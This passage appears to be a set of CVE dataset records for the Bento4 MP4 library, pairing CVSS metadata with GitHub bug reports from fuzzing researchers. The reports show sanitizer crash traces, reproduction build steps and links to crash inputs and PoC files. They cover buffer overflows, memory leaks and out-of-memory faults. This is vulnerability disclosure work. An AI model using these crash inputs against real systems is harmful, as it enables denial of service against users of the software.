Hi, developers of Bento4: In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output: ================================================================= ==4695==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000027a0 at pc 0x7ffff6ef6964 bp 0x7fffffffdea0 sp 0x7fffffffd648 WRITE of size 4294967288 at 0x6190000027a0 thread T0 #0 0x7ffff6ef6963 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c963) #1 0x409ed4 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /home/ferry/dp/Bento4/Source/C++/Core/Ap4ByteStream.cpp:785 #2 0x40d9e3 in AP4_ByteStream::Write(void const*, unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4ByteStream.cpp:77 #3 0x4eb601 in AP4_Atom::Write(AP4_ByteStream&) /home/ferry/dp/Bento4/Source/C++/Core/Ap4Atom.cpp:229 #4 0x4eb601 in AP4_Atom::Clone() /home/ferry/dp/Bento4/Source/C++/Core/Ap4Atom.cpp:316 #5 0x446d7a in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:138 #6 0x461a8f in AP4_GenericAudioSampleDescription::AP4_GenericAudioSampleDescription(unsigned int, unsigned int, unsigned short, unsigned short, AP4_AtomParent*) /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleDescription.h:259 #7 0x461a8f in AP4_AudioSampleEntry::ToSampleDescription() /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:630 #8 0x48ca03 in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181 #9 0x4040b6 in main /home/ferry/dp/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:268 #10 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #11 0x408338 in _start (/home/ferry/dp/Bento4/mp42aac+0x408338) 0x6190000027a0 is located 0 bytes to the right of 1056-byte region [0x619000002380,0x6190000027a0) allocated by thread T0 here: #0 0x7ffff6f03712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x414c8e in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x414c8e in AP4_DataBuffer::SetBufferSize(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136 #3 0x414c8e in AP4_DataBuffer::Reserve(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:107 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c327fff84a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff84f0: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==4695==ABORTING ### Crash input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/input2 ### Validation steps ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42aac input2 /dev/null ``` ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Heap-buffer-overflow with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/751/comments
0
2022-09-07T02:21:29Z
2022-09-18T23:10:27Z
https://github.com/axiomatic-systems/Bento4/issues/751
1,364,000,633
751
CVE-2022-40439
2022-09-14T21:15:10.670
An memory leak issue was discovered in AP4_StdcFileByteStream::Create in mp42ts in Bento4 v1.6.0-639, allows attackers to cause a denial of service via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/750" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/750
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing memory leaks. Here is the ASAN mode output: ================================================================= ==18321==ERROR: LeakSanitizer: detected memory leaks Direct leak of 48 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4c871d in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279 #2 0x4c871d in AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:439 Indirect leak of 72 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x404286 in main /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511 #2 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4f57d1 in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4RtpAtom.h:53 #2 0x4f57d1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689 Indirect leak of 24 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4d2591 in AP4_List<AP4_Atom>::Add(AP4_Atom*) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4List.h:160 #2 0x4d2591 in AP4_AtomParent::AddChild(AP4_Atom*, int) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4Atom.cpp:532 SUMMARY: AddressSanitizer: 208 byte(s) leaked in 4 allocation(s). ### **Crash Input** https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/input1 ### Verification steps: ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42ts input1 /dev/null ``` ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Memory leaks with ASAN in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/750/comments
0
2022-09-06T14:00:13Z
2023-05-29T02:53:17Z
https://github.com/axiomatic-systems/Bento4/issues/750
1,363,336,565
750
CVE-2022-40736
2022-09-15T04:15:24.510
An issue was discovered in Bento4 1.6.0-639. There ie excessive memory consumption in AP4_CttsAtom::Create in Core/Ap4CttsAtom.cpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/755" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/755
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# summary Hello, I use my fuzzer to fuzz binary mp4tag mp4split and mp42hevc, the three binary all crashede, and shows that allocator is out of memory trying to allocate 0xxxxxxx bytes. The version of Bento4 is the latest and the operation system is Ubuntu 18.04(docker). The following is the details. # Bug1 ``` root@c511e4bf49bc:/mp42hevc/mp42hevc# ./mp42hevc seed.demo out.hevc ================================================================= ==92089==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x54ba37b78 bytes #0 0xa1b020 in malloc /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fe65b2d6297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x6c1b9b in AP4_CttsAtom::Create(unsigned int, AP4_ByteStream&) (/mp42hevc/mp42hevc/mp42hevc+0x6c1b9b) #3 0x5cf24c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5cf24c) #4 0x5dcbb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5dcbb6) #5 0x6bd7a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp42hevc/mp42hevc/mp42hevc+0x6bd7a5) #6 0x6bc7f9 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp42hevc/mp42hevc/mp42hevc+0x6bc7f9) #7 0x5d5f65 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5d5f65) #8 0x5dcbb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5dcbb6) #9 0x6bd7a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp42hevc/mp42hevc/mp42hevc+0x6bd7a5) #10 0x6bcf4a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp42hevc/mp42hevc/mp42hevc+0x6bcf4a) #11 0x5d5abc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5d5abc) #12 0x5dcbb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5dcbb6) #13 0x6bd7a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp42hevc/mp42hevc/mp42hevc+0x6bd7a5) #14 0x6bfa61 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp42hevc/mp42hevc/mp42hevc+0x6bfa61) ==92089==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==92089==ABORTING my test case: ``` # Bug2 ``` root@c511e4bf49bc:/mp42hevc/mp42hevc# /mp4box/mp4tag/mp4tag /mp4box/mp4tag/seed.demo ================================================================= ==843687==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x3a35b4320 bytes #0 0xa38ee0 in malloc /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f9f81086297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4ae28b in AP4_CttsAtom::Create(unsigned int, AP4_ByteStream&) (/mp4box/mp4tag/mp4tag+0x4ae28b) #3 0x45f0fc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4box/mp4tag/mp4tag+0x45f0fc) #4 0x46ca96 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4box/mp4tag/mp4tag+0x46ca96) #5 0x4a9e92 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4box/mp4tag/mp4tag+0x4a9e92) #6 0x4ac151 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4box/mp4tag/mp4tag+0x4ac151) ==843687==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==843687==ABORTING ``` # Bug3 ``` root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000025,sig:06,src:000215,op:flip1,pos:31468,26038495 ================================================================= ==3151765==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x400000068 bytes #0 0xa19d40 in malloc /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f8d59cb9297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x48fc9b in AP4_CttsAtom::Create(unsigned int, AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x48fc9b) #3 0x440aec in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x440aec) #4 0x44e46b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44e46b) #5 0x48b8a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4split/mp4split/mp4split+0x48b8a5) #6 0x48b04a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4split/mp4split/mp4split+0x48b04a) #7 0x44735c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44735c) #8 0x44e46b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44e46b) #9 0x48b8a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4split/mp4split/mp4split+0x48b8a5) #10 0x48b04a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4split/mp4split/mp4split+0x48b04a) #11 0x44735c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44735c) #12 0x44e46b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44e46b) #13 0x48b8a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4split/mp4split/mp4split+0x48b8a5) #14 0x48b04a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4split/mp4split/mp4split+0x48b04a) #15 0x44735c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44735c) #16 0x44e46b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44e46b) #17 0x48b8a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4split/mp4split/mp4split+0x48b8a5) #18 0x48db61 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4split/mp4split/mp4split+0x48db61) ==3151765==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==3151765==ABORTING ``` # POC [MP42hevc_crash.zip](https://github.com/axiomatic-systems/Bento4/files/9564409/MP42hevc_crash.zip) [MP4tag_crash.zip](https://github.com/axiomatic-systems/Bento4/files/9564445/MP4tag_crash.zip) [mp4split_crash.zip](https://github.com/axiomatic-systems/Bento4/files/9565667/mp4split_crash.zip) # Credit Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory) Thank you for your time!
Out of memory in AP4_CttsAtom::Create(unsigned int, AP4_ByteStream&)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/755/comments
2
2022-09-14T08:47:21Z
2023-06-26T06:39:50Z
https://github.com/axiomatic-systems/Bento4/issues/755
1,372,600,841
755
CVE-2022-40737
2022-09-15T04:15:24.610
An issue was discovered in Bento4 through 1.6.0-639. A buffer over-read exists in the function AP4_StdcFileByteStream::WritePartial located in System/StdC/Ap4StdCFileByteStream.cpp, called from AP4_ByteStream::Write and AP4_HdlrAtom::WriteFields.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/756" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/756
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello, I use fuzzer to test bianry mp4split, and found some vulnerabilities,the following is the details. # Bug1 ``` root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000000,sig:06,src:000011,op:flip1,pos:31240,1216870 ================================================================= ==2589461==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000cfdb21 at pc 0x0000009a6c6c bp 0x7ffec6ff0d60 sp 0x7ffec6ff0510 READ of size 237 at 0x000000cfdb21 thread T0 #0 0x9a6c6b in __interceptor_fwrite.part.57 /llvm/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1143 #1 0x7ab8fa in AP4_StdcFileByteStream::WritePartial(void const*, unsigned int, unsigned int&) (/mp4split/mp4split/mp4split+0x7ab8fa) #2 0x471cf7 in AP4_ByteStream::Write(void const*, unsigned int) (/mp4split/mp4split/mp4split+0x471cf7) #3 0x4d1be1 in AP4_HdlrAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x4d1be1) #4 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #5 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #6 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #7 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #8 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #9 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #10 0x40d872 in main (/mp4split/mp4split/mp4split+0x40d872) #11 0x7f7ce8910c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x407689 in _start (/mp4split/mp4split/mp4split+0x407689) 0x000000cfdb21 is located 63 bytes to the left of global variable 'AP4_GlobalOptions::g_Entries' defined in '/Bento4-1.5.1-629/Source/C++/Core/Ap4Utils.cpp:37:56' (0xcfdb60) of size 8 0x000000cfdb21 is located 0 bytes to the right of global variable 'AP4_String::EmptyString' defined in '/Bento4-1.5.1-629/Source/C++/Core/Ap4String.cpp:39:18' (0xcfdb20) of size 1 'AP4_String::EmptyString' is ascii string '' SUMMARY: AddressSanitizer: global-buffer-overflow /llvm/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1143 in __interceptor_fwrite.part.57 Shadow bytes around the buggy address: 0x000080197b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 0x000080197b30: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 f9 0x000080197b40: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9 0x000080197b50: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9 =>0x000080197b60: f9 f9 f9 f9[01]f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x000080197b70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00 0x000080197b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2589461==ABORTING ``` # Bug2 ``` root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000001,sig:06,src:000011,op:flip1,pos:31415,1226899 AddressSanitizer:DEADLYSIGNAL ================================================================= ==2659777==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000096b50a bp 0x7ffda4354030 sp 0x7ffda4353e70 T0) ==2659777==The signal is caused by a READ memory access. ==2659777==Hint: address points to the zero page. #0 0x96b50a in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const (/mp4split/mp4split/mp4split+0x96b50a) #1 0x88e625 in AP4_EsDescriptor::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x88e625) #2 0x896a7f in AP4_Expandable::Write(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x896a7f) #3 0x4bdbcd in AP4_EsdsAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x4bdbcd) #4 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #5 0x61dbf8 in AP4_SampleEntry::Write(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x61dbf8) #6 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #7 0x676f0b in AP4_StsdAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x676f0b) #8 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #9 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #10 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #11 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #12 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #13 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #14 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #15 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #16 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #17 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #18 0x40d872 in main (/mp4split/mp4split/mp4split+0x40d872) #19 0x7f1636a2cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #20 0x407689 in _start (/mp4split/mp4split/mp4split+0x407689) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/mp4split/mp4split/mp4split+0x96b50a) in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==2659777==ABORTING ``` # poc [crash.zip](https://github.com/axiomatic-systems/Bento4/files/9565816/crash.zip) # environment Ubuntu 18.04(docker) # credit Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Han Zheng ([NCNIPC of 